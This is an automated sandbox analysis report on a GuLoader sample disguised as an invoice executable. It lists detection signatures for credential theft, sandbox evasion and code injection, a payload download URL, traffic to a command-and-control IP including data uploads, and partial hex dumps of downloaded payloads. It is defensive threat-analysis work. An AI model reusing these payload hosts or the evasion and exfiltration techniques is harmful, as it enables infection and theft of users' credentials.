Windows Analysis Report usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe

Overview

General Information

Sample Name: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Analysis ID: 482656
MD5: 257e1f881863b023fcddaedb2ac22e68
SHA1: 9cff8e3a2a2cb5ad3acba8d4260b2581e0098ac9
SHA256: 856d455d07bff404e39b422f1ad0bbff9397707c86670dbc1134729b44a8c868
Tags: exeguloader
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
Tries to detect virtualization through RDTSC time measurements
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.541230200.00000000022F0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=10smU8Pga"}
Multi AV Scanner detection for submitted file
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Virustotal: Detection: 28% Perma Link
Machine Learning detection for sample
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.102.101:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.102.132:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.24.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.24.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.24.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.24.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.24.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.24.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.24.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.24.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.24.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.24.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.24.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.24.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.24.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.24.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.24.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.24.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.24.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.24.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.24.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.24.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.24.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.24.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.24.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.24.dr
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=10smU8Pga
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /marinolumuop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: telete.in
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.158.245.117
Source: global traffic HTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/28e4ca709c3ae4e969310e3d8acd9cfc29159591 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.158.245.117
Source: global traffic HTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/fc0be222df12d21cfda3f20b85f1cab0e0a3d225 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.158.245.117
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 55359Host: 94.158.245.117
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.201.225.248 195.201.225.248
Source: Joe Sandbox View IP Address: 94.158.245.117 94.158.245.117
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 13 Sep 2021 23:07:19 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f4m8v3r8r5cuquncp7lqv8a7pcklg93e/1631574375000/14701716994733946506/*/10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-1s-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 13 Sep 2021 23:07:24 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: ldif60.dll.24.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ldif60.dll.24.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.24.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.24.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe String found in binary or memory: http://creativecommons.org/licenses/by-nc-sa/3.0/
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
